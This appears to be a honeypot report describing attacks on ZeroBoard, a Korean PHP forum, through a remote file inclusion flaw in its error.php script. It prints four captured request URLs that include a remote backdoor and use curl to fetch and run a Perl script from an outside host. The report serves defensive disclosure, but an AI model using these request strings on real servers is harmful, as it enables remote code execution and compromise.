We have been picking up increased ZeroBoard directed attacks in our honeypots. Zeroboard is one of the most popular PHP web boards in Korea.

In the following examples from one of our honeypots, the attack uses an old zeroboard vulnerability that may allow a remote attacker to execute arbritary commands:

/bbs/skin/zero_vote/error.php?dir=http://www.aasmtp.bizland.com/cmd2.gif?&cmd=cd%20/tmp;curl%20-O%20http://aasmtp.bizland.com/w0w;perl%20w0w 

/board/skin/zero_vote/error.php?dir=http://www.aasmtp.bizland.com/cmd2.gif?&cmd=cd%20/tmp;curl%20-O%20http://aasmtp.bizland.com/w0w;perl%20w0w

/zeroboard/bbs/skin/zero_vote/error.php?dir=http://www.aasmtp.bizland.com/cmd2.gif?&cmd=cd%20/tmp;curl%20-O%20http://aasmtp.bizland.com/w0w;perl%20w0w

/zboard/skin/zero_vote/error.php?dir=http://www.aasmtp.bizland.com/cmd2.gif?&cmd=cd%20/tmp;curl%20-O%20http://aasmtp.bizland.com/w0w;perl%20w0w

The issue is due to 'error.php' script not properly sanitizing user input supplied to the 'dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script. In the case of the following examples above, a backdoor program called "cmd2.gif" is being used to execute a malicious perl script called "wow". The actual packets can be studied here.

The source site shown in the example has already been suspended though there is always the possiblity of multiple sources for the attack. We could get no info regarding patch availability since the zeroboard website is in Korean.